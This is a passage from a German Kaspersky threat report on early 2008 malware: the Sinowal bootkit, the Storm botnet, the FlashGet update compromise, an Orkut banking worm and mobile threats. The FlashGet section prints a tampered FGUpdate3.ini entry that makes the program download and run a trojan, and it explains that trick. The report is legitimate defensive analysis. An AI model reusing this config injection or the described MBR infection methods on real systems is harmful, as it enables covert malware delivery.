Aktuelle IT-Bedrohungen, 1. Quartal 2008

Kaspersky Lab hat in seinem vor wenigen Monaten veröffentlichten Jahresbericht 2007 zur Entwicklung von IT-Bedrohungen einige Prognosen für 2008 getroffen. Nach den ersten drei Monaten dieses Jahres lassen sich erste Schlüsse ziehen.

Leider sind die Tendenzen des ersten Quartals 2008 wie so oft in der Antivirus-Industrie nicht sehr erfreulich. Immer schneller und schneller wächst die Zahl neuer Schadprogramme, von denen täglich mehrere tausend Varianten entdeckt werden. Dabei sind die Schädlinge technisch immer ausgereifter und richten sich zunehmend gegen Web 2.0-Technologien und mobile Geräte, die noch nicht in dem Maße geschützt sind wie traditionelle IT-Produkte.

Cyberkriminelle reaktivieren alte Ideen und Techniken für ihre Schädlinge, die nun eine weitaus größere Gefahr als ihre Vorgänger darstellen. Beispielsweise infizieren sie Dateien und die Bootsektoren von Festplatten und verbreiten Malware über mobile Datenträger.

Im ersten Quartal 2008 wurde auch die alte Garde der Virenschreiber symbolisch und wohl endgültig zu Grabe getragen. Ende Februar gab die legendäre Gruppe 29A auf ihrer Website ihre offizielle Auflösung bekannt.

Die 29A-Mitglieder waren für zahlreiche Schädlinge verantwortlich. Dazu zählt „Cap“ der erste Makrovirus, der eine globale Epidemie verursachte sowie „Stream“, der erste Virus für alternative NTFS-Ströme. Von der Gruppe stammten außerdem die mobilen Schädlinge „Cabir“ und „Duts“ sowie mit „Donut“ und „Rugrat“ die ersten Viren für die .NET-Plattform respektive die 64-Bit-Plattformen von Windows.

Die Gruppe 29A kapitulierte vor der zunehmenden Kommerzialisierung der Virenschreiberzunft. Allerdings weint ihnen kein Hersteller von Antiviren-Programmen eine Träne nach, zumal ihnen keine Zeit zum Ausruhen bleibt. Die Zeiten sind vorbei, da Schadprogramme zur Selbstverwirklichung, Selbstbestätigung oder aus reinem Forscherdrang entwickelt wurden. Heute ist es weitaus lukrativer, hunderte primitive Trojaner für den Weiterverkauf zu produzieren. Die folgenden Kapitel geben einen Überblick über die aktuellen Entwicklungen:

  1. Bootkit
  2. Der Sturm dauert an
  3. TrojanGet
  4. Soziale Würmer
  5. Mobile News

Bootkit

Bootkits sind Rootkits, die sich im Bootsektor eines Datenträgers einnisten. Seit Anfang dieses Jahres haben sich diese Schädlinge zum größten Problem der Antiviren-Industrie entwickelt. Die Öffentlichkeit weiß wenig über das Ausmaß dieses Problems und seine Bekämpfung, doch möglicherweise betrifft es schon sehr bald alle Anwender.

Geschichte

Bootkits sorgten im November 2007 für Aufregung. Ihr Ursprung ist aber auf das Jahr 1986 datiert und liegt damit 22 Jahre zurück. Viruslist.com, die Viren-Enzyklopädie von Kaspersky Lab, beschreibt die damaligen Ereignisse wie folgt:

1986 war das Jahr der ersten Virus-Epidemie auf IBM-kompatiblen Rechnern. Der Virus ‚Brain‘ infizierte den Boot-Sektor und verbreitete sich innerhalb weniger Monate in alle Welt. Brain war deswegen so erfolgreich, weil es kaum Möglichkeiten gab, Computer vor Virusattacken zu schützen. Statt über das Thema Computer-Sicherheit zu informieren, wurde die Panik durch zahlreiche Science-Fiction-Schriften nur noch weiter geschürt.

Die Autoren des Brain-Virus waren ein 19jähriger Pakistani namens Basit Farooq Alvi und sein Bruder Amjad. Ihre Namen, Adressen und Telefonnummern hatten sie in das Programm integriert. Die Brüder arbeiteten für einen Softwarehersteller und wollten nach eigener Aussage mit Hilfe des Virus herausfinden, wie stark Computer-Piraterie in ihrem Land verbreitet war. Der Virus schreib sich in den Boot-Sektor, änderte den Namen des Disketten-Inhaltsverzeichnisses in ‚© Brain‘ und war somit harmlos. Er beeinträchtigte weder die Funktionsweise des Computers und verursachte auch keinen Datenverlust. Leider verloren die Brüder die Kontrolle über ihr so genanntes Experiment und der Virus verbreitete sich weltweit.

Interessanterweise war ‚Brain‘ der erste Stealthvirus.Beim Versuch, den infizierten Sektor zu lesen, präsentierte der Virus die nicht infizierten Originaldaten.

1986 nahm die Geschichte der Bootkits ihren Anfang. Von diesem Zeitpunkt an waren Bootsektor-Viren zehn Jahre lang die am weitesten verbreiteten Schadprogramme.

Bootsektor-Viren funktionieren nach einem einfachen Prinzip. Sie nutzen Routinen, die beim Start des Rechners oder Betriebssystems zum Einsatz kommen. Das Boot-Programm liest den ersten physischen Sektor des Boot-Laufwerks, das je nach BIOS-Einstellungen unter A:, C: oder CD-ROM firmiert, und gibt anschließend die Kontrolle an das Laufwerk ab. Befindet sich im Bootsektor ein Virus, so erhält dieser die Kontrolle.

Disketten lassen sich nur auf eine einzige bekannte Methode infizieren. Der Virus ersetzt den Originalcode des Disketten-Bootsektors durch seinen eigenen Code. Bei einer Festplatte (damals noch Winchester-Laufwerk genannt), die normalerweise unter dem Laufwerksbuchstaben C: angesprochen wird, gibt es dagegen gleich drei Möglichkeiten. Entweder überschreibt der Virus den Code des Master Boot Record (MBR) oder des Bootsektors. Bei Methode Nummer drei modifiziert der Virus die Adresse des aktiven Bootsektors in der Partitionstabelle (Disk Partition Table). Diese befindet sich im MBR der Festplatte.

Bei einer infizierten Festplatte verschiebt der Virus meist den Original-Bootsektor oder den MBR auf irgendeinen anderen Sektor der Festplatte und wählt zum Beispiel den ersten freien Sektor.

Die Blütezeit der Bootviren war vorbei, als die Computerhersteller begannen, unautorisierte Schreibzugriffe auf den MBR ihrer Festplaten zu verhindern. Schließlich kamen Windows 95 und 98 auf den Markt und Disketten wurden von anderen Medien verdrängt. Damit verschwanden Bootviren fast 10 Jahre von der Bildfläche und wurden nur noch in Malware-Chroniken erwähnt.

Im Jahr 2005 gab es eine Trendwende. Auf der US-Hackerkonferenz Black Hat stellten Derek Soeder und Ryan Permeh, zwei Forscher von eEye Digital Security, das Konzept „BootRoot“ vor. Diese Technologie ermöglichte es, Code in den Bootsektor einer Festplatte einzuschleusen. Das Programm fing daraufhin den Bootvorgang des Windows-Kernel ab und errichtete eine Backdoor, durch die sich der Rechner über das lokale Netz fernsteuern liess.

Dieses Projekt zog große Aufmerksamkeit auf sich und fand schon bald Nachahmer. Im Januar 2006 erklärte John Hesman von der Firma Next Generation Security Software, dass diverse ACPI-Funktionen (Advanced Configuration and Power Interface) dazu geeignet sind, Programme mit Rootkit-Funktionalität zu entwickeln. Laut Hesman ließ sich dieser Code im Flash-Memory des BIOS speichern. Dort abgelegte Viren sind noch schwieriger zu erkennen als Boot-Backdoors. Hesman entwickelte zudem den Prototyp eines Codes, der Anwendern mehr Systemrechte verschafft und den Speicher des Computers ausliest.

Anfang 2007 stellten die beiden indischen Programmierer Nitin und Vipin Kumar das Rootkit Vbootkit vor. Dieses lädt sich aus dem Bootsektor beliebiger Datenträger und läuft unter Windows Vista. Der Vbootkit-Quellcode wurde nicht veröffentlicht, aber einer Reihe von Antivirensoftware-Herstellern zur Verfügung gestellt.

Das Funktionsprinzip von Vbootkit sieht in etwa folgendermaßen aus:

BIOS –> Vbootkit code(from CD,PXE etc.) –> MBR –> NT Boot sector –> Windows Boot manager –> Windows Loader –> Vista Kernel.

Die Autoren von Vbootkit kündigten an, dass die nächste Version ihres Schädlings auch das BIOS infizieren würde.

Eigentlich kam es so wie es früher oder später kommen musste: Ein altes Verfahren, nämlich die Infizierung des Bootsektors, wurde mit zeitgemäßer Rootkit-Technik kombiniert. Obwohl fast alle modernen Antiviren-Programme auch den Bootsektor der Festplatte scannen, entdecken sie nach wie vor keine abgefangenen und ausgetauschten Systemfunktionen. Das gelingt ihnen auch dann nicht, wenn Trojaner und Antivirus-Programm unter dem gleichen Betriebssystem laufen – ganz zu schweigen von Backdoors, die noch vor OS-Start geladen werden.

Die Malware-Lage war sehr angespannt und eskalierte schließlich ab November 2007. Ende Dezember 2007 wurden mehrere tausend Rechner vom ersten Boot-Rootkit bedroht.

Boot-Rootkit

Zwischen dem 19. und 28. Dezember 2007 erschienen verschiedene Websites, die Rechner durch Drive-by-Downloads, also über Browser-Exploits, mit einem Schadprogramm infizierten. Eine genaue Analyse ergab, dass dieses Programm in der Lage ist, den MBR und Festplattensektoren zu befallen.

Gelangt dieser Schadcode auf einen Computer, ändert er den MBR, schreibt Rootkit-Teile in einen Festplattensektor, erstellt und installiert eine Backdoor im Windows-System und löscht sich anschließend selbst.

Nach der Infizierung gibt der im MBR sitzende Code alle weiteren Bootbefehle an das Rootkit weiter, das in verschiedenen Festplattensektoren sitzt und dessen Bestandteile nicht als Dateien erfasst werden. Der Schädling übernimmt nun die Kontrolle über das bereits gebootete Windows-Betriebssystem. Den veränderten MBR und die infizierten Sektoren versteckt der Virus, indem er Systemfunktionen abfängt und austauscht und sie vermeintlich saubere Sektoren melden lässt.

Der Schadcode verbirgt nicht nur seine Anwesenheit im System, sondern installiert auf Windows-Systemen eine auf Informationsdiebstahl spezialisierte Backdoor. Diese spioniert unter anderem die Zugangsdaten zu verschiedenen Banksystemen aus.

Kaspersky Lab rekonstruierte daraufhin die Ereignisse anhand der bekannten Versionen des Rootkits, der infizierten Websites sowie der dort hinterlegten Schadprogramme. Die Analyse ergab, dass die Autoren die Drive-by-Downloads ihres Schädlings bereits seit Anfang November vorbereitet hatten. Im Zeitraum von Ende November bis Mitte Dezember wurden auch die ersten Varianten des Schadprogramms verbreitet. Im Prinzip handelte es sich dabei um Alpha-Versionen, die noch erhebliche Programmierfehler aufwiesen und belegten, dass die Autoren ihren Schädling noch optimierten.

Eine Ende Dezember 2007 veröffentlichte Variante funktionierte mehr oder weniger erfolgreich. Das Schadprogramm mit Bootkit- und Backdoor-Funktionalität wurde von Kaspersky Lab als Backdoor.Win32.Sinowal klassifiziert. Viele Funktionen der Backdoor sowie die Methode, Code zu „verunreinigen“, sind den Antiviren-Experten schon seit langem von dem Spionageprogramm Trojan-PSW.Win32.Sinowal bekannt.

Trotz aller im Bootkit umgesetzten technischen Finessen und Neuheiten konnte das Schadprogramm nur sich selbst verbergen. Die Backdoor blieb vor Entdeckung und Entfernung aber völlig ungeschützt. Das weist darauf hin, dass Bootkit und Backdoor von unterschiedlichen Personen stammen. Auf Grund verschiedener Indizien vermuten die Antiviren-Experten, dass das Bootkit von russischen Virenschreibern entwickelt wurde. Zwar gibt es viele Beispiele für die erfolgreiche Zusammenarbeit unter Virenautoren. In diesem Fall gleicht das Ergebnis aber einem Ritter, der eine fremde, hastig umgearbeitete und daher wirkungslose Rüstung angelegt hat.

Das Bootkit kommt als eigenständige Plattform und lässt sich jedem beliebigen Schadprogramm hinzufügen, um es zu schützen und im System zu verbergen. Daher könnte das Bootkit schon bald zum Verkauf angeboten werden. Das wiederum hätte zur Folge, dass dessen Technik schon bald tausenden von Script-Kiddies zur Verfügung stehen würde und sich der Virus nach dem aktuellen Wachstumstempo von Malware zu urteilen, zu einer der am weitesten verbreiteten IT-Bedrohungen entwickeln könnte.

Probleme bei der Abwehr von Bootkits

Der Schutz vor Bootkits ist mit einer Reihe von Schwierigkeiten verbunden:

  1. Der Schadcode übernimmt die Steuerung bereits vor dem Start des Betriebssystems und daher auch vor dem Start des Antiviren-Programms.
  2. Das Abfangen von Funktionen lässt sich in einem infizierten Betriebssystem nur äußerst schwer erkennen.
  3. Die Wiederherstellung abgefangener Funktionen kann zum Absturz des Betriebssystems führen.
  4. Der MBR kann nur desinfiziert werden, wenn der Original-MBR vorhanden ist.

Der effektivste Schutz vor Bootkits besteht sicherlich darin, eine Infizierung des Systems von vornherein zu verhindern. Einige Antiviren-Programme sind zwar auch in der Lage, neue und bisher unbekannte Schädlinge abzuwehren. Da sich ein solcher Schutz unter Umständen aber deaktivieren lässt, ist es in jedem Fall notwendig, bereits infizierte Systeme zu heilen.

Dabei ergeben sich zwei mögliche Szenarien: Entweder ist bereits ein Antiviren-Programm auf dem Computer installiert und hat mit allen vier oben beschriebenen Schwierigkeiten zu kämpfen oder der Rechner verfügt über keinerlei Schutzmechanismen. Im zweiten Fall kommt ein weiteres Problem hinzu, das sich aus Punkt eins ergibt. Der Schadcode könnte die Installation eines AV-Programms blockieren.

Die Virenschreiber analysierten, wie Hersteller von Antiviren-Programmen an die oben aufgeführten Probleme herangehen und brachten im Februar 2008 eine neue, verbesserte Version ihres Bootkits in Umlauf. Die bisher eingesetzten Abwehrmechanismen waren nun erneut wirkungslos geworden.

Zur gleichen Zeit erreichte die Verbreitung des Bootkits ein neues Stadium: Einige gehackte europäische Websites enthielten Links auf Exploit-Sites, welche das Bootkit installieren.

Abgesehen von Sinowal sind Kaspersky Lab noch keine anderen Schadprogramme mit Bootkit-Funktion bekannt. Bisher läuft das Katz-und-Maus-Spiel zwischen Herstellern von Antiviren-Software und Malwareschreibern nach dem üblichen Schema „Angriff und Verteidigung“ ab.

Derzeit spüren Antiviren-Tools selbst die neuen Varianten des Bootkits auf. Doch früher oder später werden sich Viren nur noch mit einem hardware- statt softwarebasierten Schutz effektiv abwehren lassen. Die entscheidende Frage lautet: Wer übernimmt als erstes die Kontrolle? Ist es Malware, so werden Antiviren-Programme wirkungslos.

Aktuelle Viren zielen wieder einmal auf den Master Boot Record ab. Vor zehn Jahren lösten Hersteller dieses Problem mit einer Bootdiskette inklusive Antiviren-Programm. Vielleicht ist es also auch für sie an der Zeit, auf alte Abwehrmaßnahmen zurückgreifen.

Der Sturm dauert an

Mitte Januar 2008 jährte sich das erstmalige Erscheinen eines Netz-Schädlings, der als Zhelatin, Nuwar oder Sturmwurm in die Malware-Geschichte eingehen sollte. Bis zu diesem Zeitpunkt war kein derart dynamisches und vielseitiges Schadprogramm bekannt.

Mit Zhelatin entwickelten die Virenschreiber diejenigen Ideen und Konzepte konsequent weiter, die sie vorher bereits in den Würmern Bagle und Warezov umgesetzt hatten. Von Bagle übernahm der Sturmwurm die Modulstruktur und von Warezov viele seiner Funktionen. Der Sturmwurm produziert mit der gleichen hohen Ausgabefrequenz neue Malware-Varianten und verschickt sich selbst über hunderte von infizierten Sites und Instant-Messaging-Tools wie Skype. Darüber hinaus verwendet die Malware Social-Engineering- und Rootkit-Techniken, greift auf ein dezentralisiertes Botnetz zurück und kann Antiviren-Software angreifen. Der Sturmwurm entwickelte sich in weniger als einem Jahr zu einer der größten IT-Bedrohungen, was sich nicht zuletzt auf sein sehr effektives Botnetz zurückführen lässt.

Die tatsächlichen Ausmaße des Sturm-Botnetzes waren völlig unbekannt. Angaben zur Anzahl der infizierten Rechner lagen im vergangenen Jahr sehr weit auseinander. Im September 2007 meinten einige Experten, das Botnetz umfasse zwei Millionen Computer, andere vermuteten, dass 250 000 bis 1 Million Rechner infiziert seinen und wieder andere schätzten den Umfang des Botnetzes auf etwa 150 000 infizierte Computer. Es gab sogar Stimmen, die von bis zu 50 Millionen Zombie-Rechnern sprachen. Die Schätzungen gingen deshalb so weit auseinander, weil sich in einem dezentralisierten Botnetz die genaue Zahl der infizierten Computer nicht eindeutig bestimmen lässt. Daher müssen sich Antiviren-Experten mit indirekten Hinweisen behelfen, die aber äußerst unsicher sind.

Immerhin war eines sicher: Das Sturm-Botnetz existierte zwar, war jedoch nicht aktiv und schien weder am Massenversand von Spam noch an DDoS-Attacken beteiligt zu sein. Dies bedeutete allerdings nicht, dass Cyberkriminelle das Botnetz nicht zu anderen kommerziellen Zwecken nutzten.

So entstand der Eindruck, dass die Zombie-Rechner ausschließlich damit beschäftigt waren, den Sturmwurm zu verbreiten. Das Schema war dabei jeweils gleich: Versenden von E-Mails, die Links auf infizierte Sites enthalten; Installation neuer Module auf den Zombie-Rechnern, um sie auf neu infizierte PCs zu laden. Der Sinn und Zweck dieses Zombie-Netzes blieb Kaspersky Lab also verborgen. Ein Botnetz um des Botnetzes willen? Berücksichtigt man die Kosten und den Aufwand für dessen Entwicklung und Pflege, lässt sich das ausschließen.

Im Oktober 2007 waren weniger E-Mails mit Zhelatin in Umlauf. Experten, die kurz vorher noch von Millionen infizierten Rechnern gesprochen hatten, schätzen den Umfang des Sturm-Botnetzes nun auf 150 000 bis 200 000 Computer. Vermutungen kamen auf, dass das Botnetz nun häppchenweise verkauft werden sollte. Zeitgleich verschickten mit dem Sturmwurm infizierte Rechner erstmals Spam. Dabei lässt sich allerdings nicht mit absoluter Sicherheit sagen, ob das Botnetz oder andere auf den Rechnern installierte Schadprogramme dahinter stecken. Eine entgültige Antwort erhielt Kaspersky Lab Ende 2007 und in den ersten Monaten des Jahres 2008.

Pünktlich zu Weihnachten kehrte der Sturmwurm zurück. Über das Botnetz wurden Millionen von E-Mails verschickt, deren Betreffzeilen „Find Some Christmas Tail“, „Warm Up this Christmas“ oder „Mrs. Clause Is Out Tonight!“ lauteten. Anwender verwiesen sie auf die präparierte Webseite merrychristmasdude.com. Über dort installierte Exploits landete der Sturmwurm per Drive-by-Download auf den Computern unvorsichtiger Surfer. Allerdings ließ sich die Site merrychristmasdude.com nicht ohne weiteres offline nehmen, um die Infizierungswelle zu beenden. Denn Zhelatin änderte die DNS-Adresse der Website mittels der Fast-Flux-Methode, so dass ihr Standort ständig zwischen 1000 dafür präparierten Computern wechselte.

Während der folgenden Tage und Wochen wiederholten sich diese Angriffe in leichten Variationen, bis am 15. Januar 2008 etwas Merkwürdiges geschah. Dabei bleibt unklar, ob es sich dabei um einen Scherz der Virenautoren oder schlichtweg einen Irrtum handelte. Über das Botnetz wurden nun E-Mails mit Valentinsgrüßen verschickt, obwohl der Valentinstag bekanntlich auf den 14. Februar fällt. Die E-Mails mit Betreffzeilen wie “Sent with Love”, “Our Love is Strong” oder “Your Love Has Opened” führten die Anwender erneut auf eine Fast-Flux-Site.

Die im Januar vom Botnetz verschickten Spam-E-Mails waren nicht nur die zahlenmäßig umfangreichsten im ersten Quartal 2008, sondern überstiegen auch die Werte für das zweite Halbjahr 2007. Durch einige gezielte Aktionen war es den Autoren von Zhelatin anscheinend gelungen, den ursprünglichen Umfang ihres Botnetzes wiederherzustellen oder ihn sogar noch zu vergrößern. Von Zhelatin befallene Computer waren an verschiedenen DoS-Attacken beteiligt. Die Firma MessageLabs schätzte, dass das Sturm-Botnetz für fast 20 Prozent des aktuellen Spam-Aufkommens im Internet verantwortlich ist.

Etwa zur selben Zeit, im Januar dieses Jahres, vermutete das Unternehmen Fortinet, das Botnetz sei an den Phishing-Attacken auf die Banken Barclays und Halifax beteiligt gewesen. Sollte das stimmen, wäre das Sturm-Botnetz erstmals zu klassischen cyberkriminellen Zwecken eingesetzt worden.

Mit zunehmender Aktivität des Sturmwurms wurden erneut Forderungen nach der Festnahme und Verurteilung seiner Autoren laut. Doch die Expertenmeinungen gehen auseinander, was die Herkunft der Sturmwurm-Programmierer betrifft. Konkrete Personen stehen ohnehin nicht unter Verdacht.

Über die Autoren kursieren derzeit zwei Theorien. Dmitry Alperovich von Secure Computing macht russische Staatsbürger für den Sturmwurm verantwortlich, die er in St. Petersburg vermutet. Alperovich zieht dabei Parallelen zum berüchtigten Russian Business Network (RBN) und den Autoren der Exploit-Sammlung Mpack. Zahlreiche andere Experten unterstützen diese Theorie.

Anderen Vermutungen zu Folge ist der Sturmwurm amerikanischen Ursprungs. Diese Ansicht gründet sich vor allem auf den Social-Engineering-Techniken der Stumwurm-Autoren, die auf eine fundierte Kenntnis amerikanischer Psyche und Verhaltensweisen schließen lassen. Die Sturmwurm-E-Mails beziehen sich auf Nachrichten und Ereignisse, die vor allem für ein amerikanisches Publikum interessant sind. Virenautoren aus europäischen Ländern und insbesondere aus Russland dürften kaum über diese Informationen verfügen.

Es gibt keine Beweise, die eine Theorie bestätigen oder widerlegen. Nach Ansicht der Experten von Kaspersky Lab ist es jedoch am wahrscheinlichsten, dass hier eine international besetzte Gruppe mit klar verteilten Aufgaben am Werk ist. Bestimmte Mitglieder sind beispielsweise zuständig für die Programmierung, andere für den Spam-Versand. Wiederum andere platzieren den Wurm auf infizierten Websites, hacken Websites, verbreiten das Schadprogramm über Instant-Messaging-Systeme und entwickeln die Exploits.

Der Sturmwurm ist bezüglich Entwicklung und Umfang viel zu komplex, um nur von einigen wenigen Personen zu stammen. Liegt Kasperky Lab mit seiner Vermutung richtig, so ist der Sturmwurm ein Musterbeispiel für moderne Cyberkriminalität mit internationaler Arbeitsteilung. Allerdings ist noch immer nicht endgültig geklärt, auf welche Weise die Cyberkriminellen mit dem Sturmwurm eigentlich Geld verdienen.

Während die Virenexperten noch nach den passenden Antworten suchten, ließen die Autoren des Sturmwurms Ende März 2008 die nächste E-Mail-Flut auf die Anwender los. Anlass für den massenweisen Versand war dieses Mal der 1. April. An diesem Tag werden den Menschen in den USA, Europa und in Russland traditionell Streiche gespielt.

TrojanGet

Obwohl es recht selten vorkommt, dient legale Software hin und wieder als Virenträger. In den vergangenen Jahren wurden immer wieder infizierte Distributionen oder Dateien an Kunden oder Partner verschickt.

Solche Vorfälle schaden dem Ruf der Software und ihres Herstellers beträchtlich. Davon sind auch vorsichtige Anwender und Hersteller von Antiviren-Programmen betroffen, die legale Software und ihre Quellen grundsätzlich als vertrauenswürdig einstufen. Im ersten Quartal 2008 gab es einen weiteren Fall dieser Art.

Anfang März erhielten die Experten von Kaspersky Lab besorgte E-Mails von Anwendern. Der auf ihren Computern installierte Kaspersky Anti-Virus hatte trojanische Programme im Verzeichnis des bekannten Download-Managers FlashGet gefunden. Eine Analyse des Problems ergab, dass jeder Anwender davon betroffen ist, der FlashGet auf seinem Rechner installiert hat. Auf infizierten PCs laufen die Programme inapp4.exe, inapp5.exe und inapp6.exe, die Kaspersky Anti-Virus als Trojan-Dropper.Win32.Agent.exo, Dropper.Win32.Agent.ezxo und Trojan-Dowloader.Win32.Agent.kht erkennt.

Seltsamerweisen wurden auf befallenen Rechnern keine weiteren trojanischen Programme gefunden, über welche die oben genannten Schädlinge ins System hätten eindringen können. Einige Systeme waren zudem mit den aktuellsten Patches für Betriebssystem und Browser ausgestattet. Wie also waren die Schadprogramme in die Computer eingedrungen?

Die Experten von Kaspersky Lab nahmen das Verzeichnis von Flashget, in dem der Trojaner saß, nun genau unter die Lupe. Es zeigte sich, dass neben den Trojaner-Files auch die Datei FGUpdate3.ini ein aktuelles Erstellungs- und Änderungsdatum aufwies. Die Unterschiede zu den Originaldateien sind blau hervorgehoben:

[Add] fgres1.ini=1.0.0.1035
FlashGet_LOGO.gif=1.0.0.1020
inapp4.exe=1.0.0.1031
[AddEx]
[fgres1.ini]
url=http://dl.flashget.com/flashget/fgres1.cab
flag=16
path=%product%
[FlashGet_LOGO.gif]
url=http://dl.flashget.com/flashget/FlashGet_LOGO.cab
flag=16
path=%product%
[inapp4.exe]
url=http://dl.flashget.com/flashget/appA.cab
flag=2
path=%product%

Der Link auf den Trojaner inapp4.exe führte auf die FlashGet-Website, von der sich der Schädling als appA.cab herunter lud. Während der Vorfall auf der Website von FlashGet verschwiegen wurde, berichteten im Forum zahlreiche Anwender von Infizierungsfällen. Diesen Informationen zufolge kam es bereits am 29. Februar zu der ersten Infizierung. Der letzte bekannte Fall ist auf den 9. März datiert. Zehn Tage lang diente ein legales Programm also als Trojan-Downloader. Auf der Webseite des Herstellers platzierte Schädlinge schleuste FlashGet ungewollt in Rechner ein und startete sie.

Inzwischen schien sich der Fall aber erledigt zu haben. Als Kaspersky Lab erstmals darüber berichtete, waren die Trojaner bereits von der Site entfernt und das für die Web-Aktualisierungen zuständige File FGUpdate3.ini in seinen ursprünglichen Zustand zurück versetzt. Am 22. März und damit weniger als zwei Wochen später entdeckte Steven Bass, ein Redakteur der Zeitschrift PC World, auf seinem Computer im FlashGet-Verzeichnis den Trojan-Downloader.Win32.Agent.kht. Anscheinend brachten die Website von FlashGet und das Programm erneut schädlichen Code in Umlauf.

Nach Meinung von Kaspersky Lab gibt es zwei Methoden, mit denen sich FlashGet in einen Trojan-Downloader verwandeln lässt.

Die erste Methode ist offensichtlich: Die Website des Herstellers wurde gehackt und die Cyberkriminellen waren folglich in der Lage, die dort abgelegte Standard-Konfigurationsdatei gegen eine trojanische Version auszutauschen. Warum sich die Hacker ausgerechnet diese Website ausgesucht haben, ist nicht bekannt. Wahrscheinlich wollten sie ihre Aktivitäten tarnen, da ein in der Konfigurations-Datei platzierter Link auf die FlashGet-Site vermutlich kein Misstrauen erweckt.

Lässt sich dieser Download-Trick auch auf beliebige andere Dateien und Webseiten anwenden? Die Antwort lautet ja. Man muss der Datei FGUpdate3.ini lediglich einen passenden Download-Link hinzufügen und die entsprechende Datei wird automatisch bei jedem Start von FlashGet auf dem Computer geladen und gestartet. Selbst wenn im Programm die Schaltfläche „Aktualisieren“ nicht angeklickt wird, bezieht FlashGet die Informationen selbstständig aus der Ini-Datei.

Von dieser Schwachstelle sind alle Versionen von FlashGet 1.9.xx betroffen. Da hilft es nur wenig, dass die die FlashGet-Site derzeit nicht gehackt ist. Denn jedes beliebige trojanische Programm kann die auf dem Computer gespeicherte Ini-Datei von FlashGet verändern und sie so in einen Trojan-Downloader umwandeln. Anstatt wie bei der ersten Methode die Webseite zu hacken, genügt es bei der zweiten Methode also, den Weblink zu ändern.

Dabei sollte auch erwähnt werden, dass sich FlashGet recht vertrauensselig gibt, also alle Netzaktivitäten und jegliche Anfragen an Websites erlaubt.

Eine offizielle Stellungnahme des chinesischen Entwicklers von FlashGet gab es bis heute nicht. Damit bleiben die Hintergründe dieser Vorkommnisse unklar und es gibt auch keine Garantie dafür, dass sich Derartiges nicht wiederholt. Hersteller von Antiviren-Software behalten sich aber nunmehr das Recht vor, FlashGet als potentiell gefährlich und damit als Riskware einzustufen. Gründe dafür gibt es genug.

Soziale Würmer

Ein Thema des 2007 veröffentlichten Jahresberichts waren die Bedrohungen für Anwender sozialer Netzwerke wie Facebook, MySpace, Livejournal oder Blogger. Laut Prognose von Kaspersky Lab werden deren User im Jahr 2008 das Hauptziel von Phishing-Attacken sein und die Nachfrage nach ihren Accounts unter Cyberkriminellen kontinuierlich steigen. Anstatt ihre Machwerke über gehackte Websites zu verbreiten, werden Virenautoren im Jahr 2008 trojanische Programme vermehrt über die Accounts, Blogs und Profile von Anwendern sozialer Netzwerke verbreiten.

Im Februar 2008 zeigte sich, dass die Erwartungen der Antivirus-Experten durchaus gerechtfertigt waren. Wieder einmal wurde das bekannte zu Google gehörende soziale Netzwerk Orkut Ziel einer Cyberattacke.

Orkut erfreut sich in einigen Ländern besonderer Beliebtheit, in erster Linie in Brasilien und Indien. Angaben des Serverdienstes Alexa Internet zufolge entfallen derzeit über 67 Prozent aller Orkut-Seitenaufrufe auf Brasilien und mehr als 15 Prozent auf Indien.

Brasilien gilt schon seit einigen Jahren als eines der weltweit „viralsten“ Länder. Die brasilianischen Virenautoren sind insbesondere für tausende Trojaner bekannt, die auf den Diebstahl von Bankzugangsdaten spezialisiert sind. Schädlingsfamilien wie Bancos, Banpaes und Banload bestehen fast ausschließlich aus trojanischen Programmen südamerikanischer Herkunft.

In Brasilien ist Online-Banking sehr verbreitet. In Brasilien ist Orkut sehr beliebt. In Brasilien gibt es sehr viele Virenschreiber. Diese drei Faktoren führten unausweichlich zum Erscheinen eines Wurms, der sich über Orkut verbreitet und Zugangsdaten für Online-Banksysteme stiehlt.

In kaum einem anderen sozialen Netzwerk waren bisher so viele Schädlinge unterwegs wie bei Orkut. Bereits zwischen 2006 und 2007 gab es dort eine Virusepidemie, von 2005 bis 2007 war Orkut das Ziel von Hackerattacken und zahlreiche Schwachstellen wurden entdeckt. Der letzte Aufsehen erregende Fall fällt auf den Dezember 2007, als die Computer von rund 700 000 Anwendern mit einem Skript-Wurm infiziert wurden.

Nur zwei Monate später, im Februar 2008, kam es erneut zu einer Epidemie. Dieses Mal machten sich die Hacker jedoch nicht die Mühe, nach einer XSS-Schwachstelle (Cross-Site Scripting) zu suchen und diese auszunutzen. Der neue Wurm funktioniert nach einem recht einfachen Prinzip:

  1. Der Anwender erhält von einem seiner Kontakte eine Mitteilung, die ein Porno-Bild in Form eines Flash-Clips enthält.
  2. Beim Klick auf die Abbildung wird der Browser auf eine schädliche Website umgeleitet.
  3. Der Anwender wird aufgefordert, den Flash-Clip abzuspielen, bei dem es sich in Wahrheit um ein trojanisches Programm handelt.
  4. Nach Download und Start des Trojaners lädt dieser verschiedene weitere Komponenten aus dem Internet auf den Computer.
  5. Der Account des Anwenders wird nun dazu verwendet, weiterere und wie unter Punkt 1 beschriebene Nachrichten zu erstellen.
  6. Ein Trojanermodul verfolgt die Orkut-Aufrufe des Anwenders.
  7. Andere Module fangen über die Tastatur eingegebene Informationen ab, wenn der Anwender eine der zahlreichen brasilianischen Bank-Websites besucht.

Die genaue Zahl der Betroffenen ist Kaspersky Lab nicht bekannt, doch die Kollegen von Symantec sprechen von mindestens 13 000 Anwendern.

Dieser Fall zeigt einmal mehr, wie verwundbar User sozialer Netzwerke sind. Anwender und Hacker sind aus den folgenden Gründen gleichermaßen an Web-2.0-Services interessiert:

  • Verlagerung der Anwenderdaten vom PC ins Internet
  • Verwendung nur eines Accounts für viele verschiedene Services
  • Detaillierte Informationen über den Anwender
  • Angaben zu dessen Verbindungen, Kontakten und Bekannten
  • Raum für Veröffentlichungen aller Art
  • Vertrauenswürdiges Verhältnis zwischen den Kontakten

Das Problem ist bereits jetzt durchaus ernst zu nehmen und die Chancen stehen gut, dass es sich zum wichtigsten Problem der IT-Sicherheit entwickelt. Kaspersky Lab wird sich demnächst in einer gesonderten Analyse genauer mit diesem Thema befassen.

Mobile News

In den ersten drei Monaten des Jahres 2008 waren mobile Viren sehr aktiv. In diesem Bereich werden die Techniken stetig weiterentwickelt und immer mehr Personen sind in deren Entwicklungsprozess involviert. Das betrifft sowohl Virenschreiber als auch AV-Experten.

Die neuen Schädlinge verteilen sich ziemlich gleichmäßig auf die vier wichtigsten Angriffsziele mobiler Viren, nämlich OC Symbian, Windows Mobile, J2ME und iPhone.

Symbian

